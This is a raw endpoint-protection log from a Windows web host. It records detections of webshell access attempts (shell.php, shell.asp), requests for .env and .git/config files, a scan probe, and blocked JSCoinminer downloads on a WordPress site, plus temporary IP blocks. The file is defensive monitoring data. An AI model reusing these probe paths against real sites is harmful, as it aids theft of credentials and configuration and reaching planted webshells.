00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000387	01dc94a2bdd4b5b2	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc94a296ed5b7b	01dc94a296ed5b7b	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk2RUM5NkNDLTk0QTItMTFGMS1CMTVGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	00008f2c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://techdsign.com/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000394	01dc94a2e8fbec72	000000ce	0000000f	164a8367	4884b993	00000002	00000002	00000001	01dc94a2c28f3ccb	01dc94a2c28f3ccb	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMyOENCNUQ3LTk0QTItMTFGMS1BM0FBLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000f08a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://ns1.nguyendolawyers.com.au/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000389	01dc94a2ec4f1a93	000000ce	0000000f	164a8367	6c84b993	00000002	00000002	00000001	01dc94a2c6a1249d	01dc94a2c6a1249d	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM2OUU5RjdFLTk0QTItMTFGMS1BNTVGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000efd6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://pop.aznet.io.vn/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038a	01dc94a30041120b	000000ce	0000000f	164a8367	4c84b993	00000002	00000002	00000001	01dc94a2dbb2a28c	01dc94a2dbb2a28c	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRCQUY2QjZFLTk0QTItMTFGMS05QzM2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000ef74	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://mailgw.geomax.vn/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038c	01dc94a3178613b2	000000ce	0000000f	164a8367	4c84b993	00000002	00000002	00000001	01dc94a2f0dcfdac	01dc94a2f0dcfdac	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYwREMyOEY2LTk0QTItMTFGMS05NzE3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000e422	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://ns2.megalog.com.vn/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038e	01dc94a324d1ada8	000000ce	0000000f	164a8367	5918ebc6	00000002	00000002	00000001	01dc94a2ffc51745	01dc94a2ffc51745	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZGQzJBMkZDLTk0QTItMTFGMS04RDU3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000f6e0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://ktplnmail.pct.com.vn/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b4	01dc94a3b3a6fbb5	000000ce	0000000f	164a8367	e10ac4b9	00000002	00000002	00000001	01dc94a38caf62b2	01dc94a38caf62b2	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhDQUU5REY5LTk0QTMtMTFGMS05NjcyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00002a31	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://khangviet.net/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a1	01dc94a5213839ae	000000ce	0000000f	164a8367	0693ecc0	00000002	00000002	00000001	01dc94a4fbbaf7d4	01dc94a4fbbaf7d4	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZCQjdEMUQxLTk0QTQtMTFGMS1CMDY0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00009662	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://phanbonquocte.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc94a53882d424	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94a53831c3a8	01dc94a69dd27fa8	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 7:37:04 AM to 2/3/2026 7:47:04 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc94a55d0c142d	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94a5380214c9	01dc94a5380214c9	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ3NTI0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDc3MjU5NjA5LCJ1aWQiOiIzQzQ1NTI0OC0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiIzN0ZFRjBDQi05NEE1LTExRjEtOUJBQy0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1kMTBmZTM2Zi1lZjBiLTRjYzctOWE1Ny1mMGFmYmVhMWM0NTcgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0MzU3Niwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA3NTY2NDQwMSwidWlkIjoiM0M0NTRFRjQtMDA3RS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000cdc1	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770079020.9779310226440429687500			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003a3	01dc94a5744d17a6	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc94a54e920390	01dc94a54e920390	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjRFOTEzRkQwLTk0QTUtMTFGMS05NTIzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00006506	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://marellascooters.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000388	01dc94a59f7a31ac	000000ce	0000000f	164a8367	ad78a814	00000002	00000002	00000001	01dc94a57a8e777c	01dc94a57a8e777c	00000001	00000110	[SID: 32329] Audit: Malicious Scan Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdBOEIyODRGLTk0QTUtMTFGMS04Nzk1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIzMjksIm5hbWUiOiJBdWRpdDogTWFsaWNpb3VzIFNjYW4gQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00007e49	00010000	00000002	00000002	00009c1c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Malicious Scan Attempt 2	http://103.131.74.22/druid/index.html			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc94a63848d72e	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc94a612e5c506	01dc94a612e5c506	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjEyRTMwMjQ4LTk0QTYtMTFGMS04NzdCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000666a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://huyanhcons.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc94a6c3c24466	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94a69dea820e	01dc94a69dea820e	00000001	00000000	Active Response that started at 2/3/2026 7:37:04 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000039f	01dc94a81016ddf4	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc94a7e9f0e94c	01dc94a7e9f0e94c	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU5RUVFMDExLTk0QTctMTFGMS1CRDBDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00005ca6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://matkinh1001.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a2	01dc94a891ba9778	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94a86de426b0	01dc94a86de426b0	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZERTM2MkU1LTk0QTgtMTFGMS04MjY0LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000b232	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://mythuatsangtao.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038e	01dc94a902bfa213	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc94a8de311df0	01dc94a8de311df0	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRFMkRGOThDLTk0QTgtMTFGMS05MzdELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	00005e9a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://phanbonquocte.com.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc94a9f8de11ec	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94a9f5b3691c	01dc94ab5b54251c	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 8:11:00 AM to 2/3/2026 8:21:00 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000da9	01dc94aa20ce4e29	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94a9f5187210	01dc94a9fb64324f	00000002	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI5MzY4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDgwNDkwODMwLCJ1aWQiOiI0NkU3M0M3Mi0wMDlCLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJGQjYzQTFCRS05NEE5LTExRjEtOUIxRC0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0xNWYxNzViNS1kN2NlLTRhMjEtOGMzZC1kNzY1MDcwYjdmMzYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyMjg0OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA3OTM3MTYyMCwidWlkIjoiM0M0NTU3MjctMDA3RS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000cb3f	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-content/themes/structure/images/logo.png			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
